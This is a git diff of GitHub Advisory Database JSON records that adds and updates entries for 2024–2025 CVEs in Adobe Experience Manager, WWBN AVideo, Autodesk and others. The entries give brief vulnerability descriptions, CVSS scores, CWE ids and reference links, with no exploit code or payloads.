"https://labs.cylera.com/2019.04.16/pe-dicom-medical-malware" }, + { + "type": "WEB", + "url": "https://www.praetorian.com/blog/elfdicom-poc-malware-polyglot-exploiting-linux-based-medical-devices" + }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/108730" diff --git a/advisories/unreviewed/2024/04/GHSA-54gx-9g28-h45h/GHSA-54gx-9g28-h45h.json b/advisories/unreviewed/2024/04/GHSA-54gx-9g28-h45h/GHSA-54gx-9g28-h45h.json index a9933366f171f..c63e3551bbf8f 100644 --- a/advisories/unreviewed/2024/04/GHSA-54gx-9g28-h45h/GHSA-54gx-9g28-h45h.json +++ b/advisories/unreviewed/2024/04/GHSA-54gx-9g28-h45h/GHSA-54gx-9g28-h45h.json @@ -1,12 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-54gx-9g28-h45h", - "modified": "2024-04-05T18:30:35Z", + "modified": "2025-07-24T18:33:16Z", "published": "2024-04-05T18:30:34Z", "aliases": [ "CVE-2024-22004" ], - "details": "Due to length check, an attacker with privilege access on a Linux Nonsecure operating system can trigger a vulnerability and leak the secure memory from the Trusted Application\n", + "details": "Due to length check, an attacker with privilege access on a Linux Nonsecure operating system can trigger a vulnerability and leak the secure memory from the Trusted Application", "severity": [ { "type": "CVSS_V3", diff --git a/advisories/unreviewed/2024/06/GHSA-jj7q-23xp-h55w/GHSA-jj7q-23xp-h55w.json b/advisories/unreviewed/2024/06/GHSA-jj7q-23xp-h55w/GHSA-jj7q-23xp-h55w.json index cebd272cabb64..16309617e9765 100644 --- a/advisories/unreviewed/2024/06/GHSA-jj7q-23xp-h55w/GHSA-jj7q-23xp-h55w.json +++ b/advisories/unreviewed/2024/06/GHSA-jj7q-23xp-h55w/GHSA-jj7q-23xp-h55w.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-665" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/12/GHSA-8836-mwr2-27hr/GHSA-8836-mwr2-27hr.json b/advisories/unreviewed/2024/12/GHSA-8836-mwr2-27hr/GHSA-8836-mwr2-27hr.json index 3691ec0d0b267..75df72c1e50ed 100644 --- a/advisories/unreviewed/2024/12/GHSA-8836-mwr2-27hr/GHSA-8836-mwr2-27hr.json +++ b/advisories/unreviewed/2024/12/GHSA-8836-mwr2-27hr/GHSA-8836-mwr2-27hr.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-8836-mwr2-27hr", - "modified": "2024-12-18T21:30:55Z", + "modified": "2025-07-24T18:33:17Z", "published": "2024-12-18T21:30:55Z", "aliases": [ "CVE-2024-47038" ], "details": "In dhd_prot_flowrings_pool_release of dhd_msgbuf.c, there is a possible outcof bounds write due to a missing bounds check. This could lead to localcescalation of privilege with no additional execution privileges needed. Usercinteraction is not needed for exploitation.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2024/12/GHSA-gvx5-h8g7-3fhv/GHSA-gvx5-h8g7-3fhv.json b/advisories/unreviewed/2024/12/GHSA-gvx5-h8g7-3fhv/GHSA-gvx5-h8g7-3fhv.json index 447f62c5aeda4..b46a3fb973275 100644 --- a/advisories/unreviewed/2024/12/GHSA-gvx5-h8g7-3fhv/GHSA-gvx5-h8g7-3fhv.json +++ b/advisories/unreviewed/2024/12/GHSA-gvx5-h8g7-3fhv/GHSA-gvx5-h8g7-3fhv.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-gvx5-h8g7-3fhv", - "modified": "2024-12-18T21:30:55Z", + "modified": "2025-07-24T18:33:17Z", "published": "2024-12-18T21:30:55Z", "aliases": [ "CVE-2024-47039" ], "details": "In isSlotMarkedSuccessful of BootControl.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local  information disclosure with no additional execution privileges needed. User  interaction is not needed for exploitation.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2024/12/GHSA-rf6v-wqgm-f86h/GHSA-rf6v-wqgm-f86h.json b/advisories/unreviewed/2024/12/GHSA-rf6v-wqgm-f86h/GHSA-rf6v-wqgm-f86h.json index 7a3934b9f8df5..d2c1b39836d69 100644 --- a/advisories/unreviewed/2024/12/GHSA-rf6v-wqgm-f86h/GHSA-rf6v-wqgm-f86h.json +++ b/advisories/unreviewed/2024/12/GHSA-rf6v-wqgm-f86h/GHSA-rf6v-wqgm-f86h.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-rf6v-wqgm-f86h", - "modified": "2024-12-18T21:30:55Z", + "modified": "2025-07-24T18:33:17Z", "published": "2024-12-18T21:30:55Z", "aliases": [ "CVE-2024-47040" ], "details": "There is a possible UAF due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2025/07/GHSA-368c-2fxg-w24f/GHSA-368c-2fxg-w24f.json b/advisories/unreviewed/2025/07/GHSA-368c-2fxg-w24f/GHSA-368c-2fxg-w24f.json new file mode 100644 index 0000000000000..47146c374a9ba --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-368c-2fxg-w24f/GHSA-368c-2fxg-w24f.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-368c-2fxg-w24f", + "modified": "2025-07-24T18:33:18Z", + "published": "2025-07-24T18:33:18Z", + "aliases": [ + "CVE-2025-46996" + ], + "details": "Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46996" + }, + { + "type": "WEB", + "url": "https://helpx.adobe.com/security/products/experience-manager/apsb25-48.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T16:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-4c85-w99g-9v4w/GHSA-4c85-w99g-9v4w.json b/advisories/unreviewed/2025/07/GHSA-4c85-w99g-9v4w/GHSA-4c85-w99g-9v4w.json new file mode 100644 index 0000000000000..402483aa5bc8a --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-4c85-w99g-9v4w/GHSA-4c85-w99g-9v4w.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4c85-w99g-9v4w", + "modified": "2025-07-24T18:33:19Z", + "published": "2025-07-24T18:33:19Z", + "aliases": [ + "CVE-2025-5039" + ], + "details": "A maliciously crafted binary file, when present while loading files in certain Autodesk applications, could lead to execution of arbitrary code in the context of the current process due to an untrusted search path being utilized.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5039" + }, + { + "type": "WEB", + "url": "https://www.autodesk.com/trust/security-advisories/adsk-sa-2025-0014" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-426" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T17:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-7qv6-qqv7-4w43/GHSA-7qv6-qqv7-4w43.json b/advisories/unreviewed/2025/07/GHSA-7qv6-qqv7-4w43/GHSA-7qv6-qqv7-4w43.json new file mode 100644 index 0000000000000..65d79a85570be --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-7qv6-qqv7-4w43/GHSA-7qv6-qqv7-4w43.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7qv6-qqv7-4w43", + "modified": "2025-07-24T18:33:18Z", + "published": "2025-07-24T18:33:18Z", + "aliases": [ + "CVE-2025-46410" + ], + "details": "A cross-site scripting (xss) vulnerability exists in the managerPlaylists PlaylistOwnerUsersId parameter functionality of WWBN AVideo 14.4 and dev master commit 8a8954ff. A specially crafted HTTP request can lead to arbitrary Javascript execution. An attacker can get a user to visit a webpage to trigger this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46410" + }, + { + "type": "WEB", + "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2205" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T16:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-8fxc-vw38-fhp2/GHSA-8fxc-vw38-fhp2.json b/advisories/unreviewed/2025/07/GHSA-8fxc-vw38-fhp2/GHSA-8fxc-vw38-fhp2.json new file mode 100644 index 0000000000000..bd0f15383c250 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-8fxc-vw38-fhp2/GHSA-8fxc-vw38-fhp2.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8fxc-vw38-fhp2", + "modified": "2025-07-24T18:33:18Z", + "published": "2025-07-24T18:33:18Z", + "aliases": [ + "CVE-2025-53084" + ], + "details": "A cross-site scripting (xss) vulnerability exists in the videosList page parameter functionality of WWBN AVideo 14.4 and dev master commit 8a8954ff. A specially crafted HTTP request can lead to arbitrary Javascript execution. An attacker can get a user to visit a webpage to trigger this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53084" + }, + { + "type": "WEB", + "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2206" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T16:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-c3rq-2h7j-m68m/GHSA-c3rq-2h7j-m68m.json b/advisories/unreviewed/2025/07/GHSA-c3rq-2h7j-m68m/GHSA-c3rq-2h7j-m68m.json new file mode 100644 index 0000000000000..18f682e985409 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-c3rq-2h7j-m68m/GHSA-c3rq-2h7j-m68m.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c3rq-2h7j-m68m", + "modified": "2025-07-24T18:33:18Z", + "published": "2025-07-24T18:33:18Z", + "aliases": [ + "CVE-2025-48732" + ], + "details": "An incomplete blacklist exists in the .htaccess sample of WWBN AVideo 14.4 and dev master commit 8a8954ff. A specially crafted HTTP request can lead to a arbitrary code execution. An attacker can request a .phar file to trigger this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48732" + }, + { + "type": "WEB", + "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2213" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-184" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T16:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-f734-p3hx-8cw4/GHSA-f734-p3hx-8cw4.json b/advisories/unreviewed/2025/07/GHSA-f734-p3hx-8cw4/GHSA-f734-p3hx-8cw4.json index ebe66e8323c56..5b0f6cb6855f6 100644 --- a/advisories/unreviewed/2025/07/GHSA-f734-p3hx-8cw4/GHSA-f734-p3hx-8cw4.json +++ b/advisories/unreviewed/2025/07/GHSA-f734-p3hx-8cw4/GHSA-f734-p3hx-8cw4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-f734-p3hx-8cw4", - "modified": "2025-07-08T18:31:22Z", + "modified": "2025-07-24T18:33:17Z", "published": "2025-07-07T18:32:27Z", "aliases": [ "CVE-2024-25177" @@ -27,6 +27,10 @@ "type": "WEB", "url": "https://github.com/LuaJIT/LuaJIT/commit/85b4fed0b0353dd78c8c875c2f562d522a2b310f" }, + { + "type": "WEB", + "url": "https://github.com/openresty/luajit2/commit/85b4fed0b0353dd78c8c875c2f562d522a2b310f" + }, { "type": "WEB", "url": "https://gist.github.com/pwnhacker0x18/a73f560d79f2c3d4011d6c5a2676f04a" diff --git a/advisories/unreviewed/2025/07/GHSA-f945-59hq-g56j/GHSA-f945-59hq-g56j.json b/advisories/unreviewed/2025/07/GHSA-f945-59hq-g56j/GHSA-f945-59hq-g56j.json new file mode 100644 index 0000000000000..32fa6c727f687 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-f945-59hq-g56j/GHSA-f945-59hq-g56j.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f945-59hq-g56j", + "modified": "2025-07-24T18:33:18Z", + "published": "2025-07-24T18:33:18Z", + "aliases": [ + "CVE-2025-46993" + ], + "details": "Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46993" + }, + { + "type": "WEB", + "url": "https://helpx.adobe.com/security/products/experience-manager/apsb25-48.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T16:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-jxf5-j9w5-328x/GHSA-jxf5-j9w5-328x.json b/advisories/unreviewed/2025/07/GHSA-jxf5-j9w5-328x/GHSA-jxf5-j9w5-328x.json index 340c08c854e58..c515353629800 100644 --- a/advisories/unreviewed/2025/07/GHSA-jxf5-j9w5-328x/GHSA-jxf5-j9w5-328x.json +++ b/advisories/unreviewed/2025/07/GHSA-jxf5-j9w5-328x/GHSA-jxf5-j9w5-328x.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jxf5-j9w5-328x", - "modified": "2025-07-08T21:30:26Z", + "modified": "2025-07-24T18:33:18Z", "published": "2025-07-08T15:32:03Z", "aliases": [ "CVE-2025-47422" @@ -23,6 +23,10 @@ "type": "WEB", "url": "https://www.advancedinstaller.com/advanced-installer-security-fixes-retrospective.html" }, + { + "type": "WEB", + "url": "https://www.advancedinstaller.com/advanced-installer-security-fixes-retrospective.html#update-deprecated-apis-used-to-resolve-paths" + }, { "type": "WEB", "url": "https://www.advancedinstaller.com/release-22.6.html" diff --git a/advisories/unreviewed/2025/07/GHSA-m4mv-3rr9-5v5x/GHSA-m4mv-3rr9-5v5x.json b/advisories/unreviewed/2025/07/GHSA-m4mv-3rr9-5v5x/GHSA-m4mv-3rr9-5v5x.json new file mode 100644 index 0000000000000..c6595e815d8f0 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-m4mv-3rr9-5v5x/GHSA-m4mv-3rr9-5v5x.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m4mv-3rr9-5v5x", + "modified": "2025-07-24T18:33:19Z", + "published": "2025-07-24T18:33:19Z", + "aliases": [ + "CVE-2025-45702" + ], + "details": "SoftPerfect Pty Ltd Connection Quality Monitor v1.1 was discovered to store all credentials in plaintext.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-45702" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/christiankold/Vulnerabilities/refs/heads/main/CVE-2025-45702" + }, + { + "type": "WEB", + "url": "https://softperfect.com" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T17:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-mpm9-743p-4mm9/GHSA-mpm9-743p-4mm9.json b/advisories/unreviewed/2025/07/GHSA-mpm9-743p-4mm9/GHSA-mpm9-743p-4mm9.json new file mode 100644 index 0000000000000..cc56f970bc9cb --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-mpm9-743p-4mm9/GHSA-mpm9-743p-4mm9.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mpm9-743p-4mm9", + "modified": "2025-07-24T18:33:18Z", + "published": "2025-07-24T18:33:18Z", + "aliases": [ + "CVE-2025-47061" + ], + "details": "Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47061" + }, + { + "type": "WEB", + "url": "https://helpx.adobe.com/security/products/experience-manager/apsb25-48.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T16:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-pj98-r854-3m4h/GHSA-pj98-r854-3m4h.json b/advisories/unreviewed/2025/07/GHSA-pj98-r854-3m4h/GHSA-pj98-r854-3m4h.json new file mode 100644 index 0000000000000..c9ff8b660ec64 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-pj98-r854-3m4h/GHSA-pj98-r854-3m4h.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pj98-r854-3m4h", + "modified": "2025-07-24T18:33:18Z", + "published": "2025-07-24T18:33:18Z", + "aliases": [ + "CVE-2025-25214" + ], + "details": "A race condition vulnerability exists in the aVideoEncoder.json.php unzip functionality of WWBN AVideo 14.4 and dev master commit 8a8954ff. A series of specially crafted HTTP request can lead to arbitrary code execution.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-25214" + }, + { + "type": "WEB", + "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2212" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-362" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T16:15:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-q8hh-q8j4-4vqq/GHSA-q8hh-q8j4-4vqq.json b/advisories/unreviewed/2025/07/GHSA-q8hh-q8j4-4vqq/GHSA-q8hh-q8j4-4vqq.json new file mode 100644 index 0000000000000..952384e01baa2 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-q8hh-q8j4-4vqq/GHSA-q8hh-q8j4-4vqq.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q8hh-q8j4-4vqq", + "modified": "2025-07-24T18:33:18Z", + "published": "2025-07-24T18:33:18Z", + "aliases": [ + "CVE-2025-41420" + ], + "details": "A cross-site scripting (xss) vulnerability exists in the userLogin cancelUri parameter functionality of WWBN AVideo 14.4 and dev master commit 8a8954ff. A specially crafted HTTP request can lead to arbitrary Javascript execution. An attacker can get a user to visit a webpage to trigger this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41420" + }, + { + "type": "WEB", + "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2209" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T16:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-r8qx-fh67-vh4r/GHSA-r8qx-fh67-vh4r.json b/advisories/unreviewed/2025/07/GHSA-r8qx-fh67-vh4r/GHSA-r8qx-fh67-vh4r.json new file mode 100644 index 0000000000000..33b396cd1d705 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-r8qx-fh67-vh4r/GHSA-r8qx-fh67-vh4r.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r8qx-fh67-vh4r", + "modified": "2025-07-24T18:33:18Z", + "published": "2025-07-24T18:33:18Z", + "aliases": [ + "CVE-2025-36548" + ], + "details": "A cross-site scripting (xss) vulnerability exists in the LoginWordPress loginForm cancelUri parameter functionality of WWBN AVideo 14.4 and dev master commit 8a8954ff. A specially crafted HTTP request can lead to arbitrary Javascript execution. An attacker can get a user to visit a webpage to trigger this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-36548" + }, + { + "type": "WEB", + "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2208" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T16:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-rh7r-mcgw-hv69/GHSA-rh7r-mcgw-hv69.json b/advisories/unreviewed/2025/07/GHSA-rh7r-mcgw-hv69/GHSA-rh7r-mcgw-hv69.json new file mode 100644 index 0000000000000..9bca1b7b5cb11 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-rh7r-mcgw-hv69/GHSA-rh7r-mcgw-hv69.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rh7r-mcgw-hv69", + "modified": "2025-07-24T18:33:18Z", + "published": "2025-07-24T18:33:18Z", + "aliases": [ + "CVE-2025-50128" + ], + "details": "A cross-site scripting (xss) vulnerability exists in the videoNotFound 404ErrorMsg parameter functionality of WWBN AVideo 14.4 and dev master commit 8a8954ff. A specially crafted HTTP request can lead to arbitrary Javascript execution. An attacker can get a user to visit a webpage to trigger this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50128" + }, + { + "type": "WEB", + "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2207" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T16:15:32Z" + } +} \ No newline at end of file From d783fd9b4d3c9c7c1ee8d7b3031b3d41e4266e87 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Thu, 24 Jul 2025 21:32:07 +0000 Subject: [PATCH 139/323] Advisory Database Sync --- .../GHSA-6qvm-8hqf-vwf3.json | 3 +- .../GHSA-743h-33qg-wchq.json | 2 +- .../GHSA-h7wp-62hc-fvm5.json | 2 +- .../GHSA-hh2m-m355-4q3p.json | 2 +- .../GHSA-p7mf-j4fj-4rq3.json | 3 +- .../GHSA-259q-pfhc-h3v8.json | 52 ++++++++++++++++ .../GHSA-2g7m-ph9x-7q7m.json | 44 ++++++++++++++ .../GHSA-585m-wrg3-hrv2.json | 15 +++-- .../GHSA-5jcw-5gh7-q3j5.json | 15 +++-- .../GHSA-5pmg-9wjw-p4p3.json | 60 +++++++++++++++++++ .../GHSA-5vmr-wpf7-5897.json | 40 +++++++++++++ .../GHSA-6c72-qmmh-6499.json | 15 +++-- .../GHSA-6jm3-cv8m-6fx9.json | 2 +- .../GHSA-6p6h-9jg2-w75j.json | 15 +++-- .../GHSA-g2qh-fgm2-83wp.json | 40 +++++++++++++ .../GHSA-hm55-vj5m-259p.json | 40 +++++++++++++ .../GHSA-j2w6-jmvx-4q23.json | 36 +++++++++++ .../GHSA-jwv9-pqwx-gv9g.json | 15 +++-- .../GHSA-m4mv-3rr9-5v5x.json | 15 +++-- .../GHSA-qc4j-v7h6-xr5h.json | 44 ++++++++++++++ .../GHSA-qh33-r6h9-wf62.json | 15 +++-- .../GHSA-qp5w-v6qc-vx8v.json | 15 +++-- .../GHSA-rqmp-p5qj-qxjh.json | 40 +++++++++++++ .../GHSA-v3gf-cfpp-pjjg.json | 36 +++++++++++ .../GHSA-vqm9-87vr-9765.json | 36 +++++++++++ .../GHSA-w788-65r2-9qhp.json | 36 +++++++++++ .../GHSA-wj97-j26v-v8wp.json | 40 +++++++++++++ 27 files changed, 640 insertions(+), 38 deletions(-) create mode 100644 advisories/unreviewed/2025/07/GHSA-259q-pfhc-h3v8/GHSA-259q-pfhc-h3v8.json create mode 100644 advisories/unreviewed/2025/07/GHSA-2g7m-ph9x-7q7m/GHSA-2g7m-ph9x-7q7m.json create mode 100644 advisories/unreviewed/2025/07/GHSA-5pmg-9wjw-p4p3/GHSA-5pmg-9wjw-p4p3.json create mode 100644 advisories/unreviewed/2025/07/GHSA-5vmr-wpf7-5897/GHSA-5vmr-wpf7-5897.json create mode 100644 advisories/unreviewed/2025/07/GHSA-g2qh-fgm2-83wp/GHSA-g2qh-fgm2-83wp.json create mode 100644 advisories/unreviewed/2025/07/GHSA-hm55-vj5m-259p/GHSA-hm55-vj5m-259p.json create mode 100644 advisories/unreviewed/2025/07/GHSA-j2w6-jmvx-4q23/GHSA-j2w6-jmvx-4q23.json create mode 100644 advisories/unreviewed/2025/07/GHSA-qc4j-v7h6-xr5h/GHSA-qc4j-v7h6-xr5h.json create mode 100644 advisories/unreviewed/2025/07/GHSA-rqmp-p5qj-qxjh/GHSA-rqmp-p5qj-qxjh.json create mode 100644 advisories/unreviewed/2025/07/GHSA-v3gf-cfpp-pjjg/GHSA-v3gf-cfpp-pjjg.json create mode 100644 advisories/unreviewed/2025/07/GHSA-vqm9-87vr-9765/GHSA-vqm9-87vr-9765.json create mode 100644 advisories/unreviewed/2025/07/GHSA-w788-65r2-9qhp/GHSA-w788-65r2-9qhp.json create mode 100644 advisories/unreviewed/2025/07/GHSA-wj97-j26v-v8wp/GHSA-wj97-j26v-v8wp.json diff --git a/advisories/unreviewed/2025/03/GHSA-6qvm-8hqf-vwf3/GHSA-6qvm-8hqf-vwf3.json 